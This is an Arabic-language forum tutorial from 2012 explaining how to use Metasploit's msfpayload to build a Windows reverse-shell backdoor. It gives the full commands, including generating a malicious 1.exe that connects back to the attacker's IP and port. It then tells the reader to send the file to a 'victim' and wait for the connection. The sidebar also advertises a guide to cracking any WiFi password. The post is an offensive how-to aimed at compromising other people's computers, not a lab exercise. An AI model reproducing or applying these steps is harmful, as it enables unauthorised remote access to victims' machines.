المنتدى العربى

اهلاً بيك اخى الزائر المنتدى فريد من نوعه
سوف تتمتع بمميزات كثيره ودورات حصريه نظريه و عمليه
هذا كله عند اشتراكك معانا
وبعد الاشتراك قوم بطلب الهديه وهيا مفاجاه
المنتدى العربى

المنتدى العربى لجميع تخصصات الجرافيك دروس فوتوشوب تحميل فوتوشوب دروس فى لغات البرمجه المخصصه لصنع المواقع و دروس لغات البرمجة المخصصه لصنع البرامج والكثير...............

شارك معنا

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 

المواضيع الأخيرة

» مهرجانات YouTube
الإثنين أغسطس 03, 2015 8:19 pm من طرف momenmomen44

»  لعبة ذا لوست تايتنز The Lost Titans
الإثنين مارس 24, 2014 5:16 pm من طرف Admin

»  شرح التسجيل فى لعبة ذا لوست تايتنز The Lost Titans
الإثنين مارس 24, 2014 4:31 pm من طرف Admin

» شرح لعبة اللودز - شرح التسجيل في لعبة Allods
الثلاثاء مارس 04, 2014 2:54 pm من طرف Admin

» شرح كسر باسوورد أي شبكة ويفي ببرنامج Commview for wifi
السبت يونيو 15, 2013 9:43 pm من طرف nadel

» شرح تعطيل الدوال و تشغيل السيف مود
الخميس مايو 30, 2013 11:33 pm من طرف Admin

» شرح لمنع الـ Nmap من فحص بورتات السيرفر
الخميس مايو 30, 2013 11:10 pm من طرف Admin

» اوامر اعادة التشغيل السيرفرات
الخميس مايو 30, 2013 10:39 pm من طرف Admin

» تثبين الاداه set و اعدادها بشكل صحيح لتعمل علي توزيعات لينكس
السبت أبريل 20, 2013 1:43 pm من طرف Admin

موقع صديق


    شرح Binary Payloads للميتا اسبوليت

    شاطر

    momenmomen44
    Admin
    Admin

    عدد المساهمات : 11
    نقاط : 1832
    تاريخ التسجيل : 08/01/2012
    العمر : 26
    الموقع : www.look-here.yoo7.com

    شرح Binary Payloads للميتا اسبوليت

    مُساهمة من طرف momenmomen44 في الأحد يناير 08, 2012 10:03 pm

    بسم الله الرحمن الرحيم

    =================

    ما هي Binary Payloads وما وظيفتها ؟

    Binary Payloads نقدر نقول عليها ملفات تنفيذية علي جميع الانتظمة اي انها في انظمة الوندوز تكون بامتداد exe وفي اللنكس sh , prel , python , ruby

    و في الماك تكون mdg اي انها الملفات التي عند الضغط عليها يتم تنفيذها وظيفتها انها تكون ملغمه بباكدور او باتش او بايلود كلها

    مسميات واحده لملف خبيث يتم ذرعه في الملف التنفيذي علي اي نظام

    وتلك الطريقه من افضل الطرق التي يمكن ان تخترق بها من خلال الميتا اسبوليت بعكس طرق الثغرات

    وده لان الضحيه بيبقي عنده ملف بيتصل بينا او احنا بنتصل بيه علي حسب اعدادت الملف .

    من المعروف ان الميتا اسبوليت لها العديد من الواجهات وهي كالتالي

    Msfgui , armget , msfconsole , msfcli , msfpayload

    كل تلك الوجهات يمكن تنفيذ وتكوين الملفات التنفيذية الملغمة بكل سهولة من خلالها

    يمكنكم مراجعه الرابط التالي لمعرفة كيفيه عمل تلك الملفات من خلال الوجهة msfgui

    تكوين الباكدور عن طريق msfgui واختراق الجهاز

    طيب ايه الجديد في درسنا اليوم

    ما يميز الميتا اسبوليت انه هناك دائما طرق كثيرة للوصول الي نفس النتيجه

    وده بيوفر الكثير من الجهد والمجهود اليوم سوف اشرح اذاي تكون تلك الملفات من خلال

    الواجه msfpayload

    الموضوع بسيط جدا سوف نستعمل توزيعه الباك تراك

    بالنسبه للواجه msfpayload

    الطريقه كالتالي افتح الطرفية واكتب الامر التالي

    الرمز:
    msfpayload windows/shell_reverse_tcp O

    دعونا نشرح الامر بتروي msfpayload

    نوع الوجه التي سوف يتم استخدماها في التنفيذ windows/shell_reverse_tcp نوع الملف الذي سوف يتم عمله

    وطبعا هيبقي لينا دروس اخري عن تلك الانواع يكفي الان ان نعرف انه نوعه هكذا وفي النهاية O بمعني اعرضلي الخيارات

    التي سوف احتاجها من اجل تكوين هذا الملف المفروض هيطلعلك نتائج مثل هذة
    الرمز:

    Name: Windows Command Shell, Reverse TCP Inline
    Version: 6479
    Platform: Windows
    Arch: x86
    Needs Admin: No
    Total size: 287
    Provided by:
    vlad902 vlad902@gmail.com
    Basic options:
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  seh              yes      Exit technique: seh, thread, process
    LHOST                      yes      The local address
    LPORT      4444            yes      The local port
    Description:
    Connect back to attacker and spawn a command shell

    جميل جدا تعالوا نفصص تلك الخياريات وهي كالتالي

    Name: Windows Command Shell, Reverse TCP Inline اسم الملف المراد تكوينه ونوعه ونوع الاتصال وهو tcp

    Version: 6479 اصدار الملف المراد تكوينه

    Platform: Windows نظام التشغيل الذي يعمل عليه

    Arch: x86نوع المعالج الذي يعمل عليه

    Needs Admin: No تحتاج الملف لصلاحيات الادمن لا طبعا

    Total size: 287حجم الملف بالكيلوبايت

    Provided by: vlad902 vlad902@gmail.com الراجل صاحب الملف

    كل ما سبق معلومات عن الملف نفسه نحتاج الي نعرف الخيارات المتاحه لينا من اجل تنفيذ الملف

    الرمز:
    LHOST                      yes      The local address

    الملف هنا يحتاج الي الخيار LHOST وهو الاي بي الخاص بينا احنا المخترق يعني

    الرمز:
    LPORT      4444            yes      The local port

    وهنا ايضا يحتاج الي الخيار LPORT هو البورت الخاص بالمخترق ايضا وهنا هو محدد بورت افتراضي يمكنك الالتزام به او تجاهله وتغير البورت

    Connect back to attacker and spawn a command shell هنا ده السطر بشرحلك الوظيفه اللي بيقوم بيها الملف هذا الملف بيقلك انه بعيمل

    اتصال بينك وبين الضحيه وبيفتحله شل بينك وبين جهاز الضحية .

    الان بعد ما عرفنا معلومات عن الملف المراد تكوينه معرفنا ايضا معلومات عن طريقه الاستخدام

    كيف نقوم بتنفيذ الملف نقوم بعمل الامر التالي

    الرمز:
    msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

    نبدأ نفصص الامر واحده واحده

    msfpayload طبعا اسم الواجه المستخدمة في عمل الملف

    windows/shell_reverse_tcp نوع الباكدور المستخدم

    LHOST=172.16.104.130 طبعا هنا اول خيار من خيرات التي تم التعرف عليها سابقا في الامر السابق هنا وضعنا الخيار ووضعنا الاي بي الخاص بينا

    LPORT=31337 هنا طبعا ثاني خيار ايضا من الخيارات التي تم التعرف عليها من الامر السابق وبعدها وضعنا البروت المستخدم في جهازنا

    X لاننا نريد استخدام الملف كلمف exe لانظمة الوندوز لازم تعمل حرف الاكس ده طبعا لو عايزين ملف بريل مثلا نخليها pl او py او rb حسب نظام التشغيل المراد اختراقه

    > /tmp/1.exe الامتداد الذي نريد وضع الملف فيه واسمه

    الان نذهب الي المجلد tmp هنلاقي ملف اسمه 1.exe هو ده الملف الخبيث بتاعنا

    ونبعث به للضحية ولكن قبل ذلك يجب ان نقوم بالخطوة رقم 2 وهي انتظار الاتصال الخاص بالضحية اولا

    لكي يتم الاختراق

    مع تحيات فريق عمل المنتدي العربى

      الوقت/التاريخ الآن هو الأحد ديسمبر 11, 2016 8:59 am